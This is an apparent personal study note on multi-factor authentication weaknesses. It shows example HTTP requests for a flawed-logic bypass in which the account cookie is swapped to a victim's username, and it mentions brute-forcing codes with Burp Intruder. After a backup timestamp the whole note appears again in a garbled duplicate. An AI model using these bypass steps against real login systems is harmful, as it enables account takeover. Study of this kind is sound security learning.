handbook/tools/3.Web-Hacking/3.Business-Logic/Authentification-Vulnerability/Notes/2.Multi-factor-Authentication.md


## Multi-Factor Authentication

Two-Factor Authentication Tokens
- Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
- Other websites send a code via text message which is open to abuse
	Code is being transmitted via SMS rather than by the device itself
	Code can be intercepted via SIM swapping among other means

Bypassing Two-Factor Authentication
- Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic

1. User logs in with normal creds
```
POST /login-steps/first
HTTP/1.1
Host: vulnerable-website.com
...
username=carlos&password=qwerty
```

2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process
```
HTTP/1.1 200 OK
Set-Cookie: account=carlos
GET /login-steps/second
HTTP/1.1
Cookie: account=carlos
```

3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=carlos
...
verification-code=123456
```

4. You can change the "account" cookie to any username when submitting the code
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=victim-user
...
verification-code=123456
```


Brute-forcing 2FA Verification Codes
- This can be automated by creating macros for Burp Intruder
- This can also be done with the Turbo Intruder extension
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Multi-Factor Authentication`

			`Two-Factor Authentication Tokens`
			`- Some websites send a verification code via a dedicated device or app (such as Google Authenticator)`
			`- Other websites send a code via text message which is open to abuse`
			`Code is being transmitted via SMS rather than by the device itself`
			`Code can be intercepted via SIM swapping among other means`

			`Bypassing Two-Factor Authentication`
			`- Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic`

			`1. User logs in with normal creds`
			```
			`POST /login-steps/first`
			`HTTP/1.1`
			`Host: vulnerable-website.com`
			`...`
			`username=carlos&password=qwerty`
			```

			`2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process`
			```
			`HTTP/1.1 200 OK`
			`Set-Cookie: account=carlos`
			`GET /login-steps/second`
			`HTTP/1.1`
			`Cookie: account=carlos`
			```

			`3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access`
			```
			`POST /login-steps/second`
			`HTTP/1.1`
			`Host: vulnerable-`
			`website.com`
			`Cookie: account=carlos`
			`...`
			`verification-code=123456`
			```

			`4. You can change the "account" cookie to any username when submitting the code`
			```
			`POST /login-steps/second`
			`HTTP/1.1`
			`Host: vulnerable-`
			`website.com`
			`Cookie: account=victim-user`
			`...`
			`verification-code=123456`
			```


			`Brute-forcing 2FA Verification Codes`
			`- This can be automated by creating macros for Burp Intruder`
			`- This can also be done with the Turbo Intruder extension`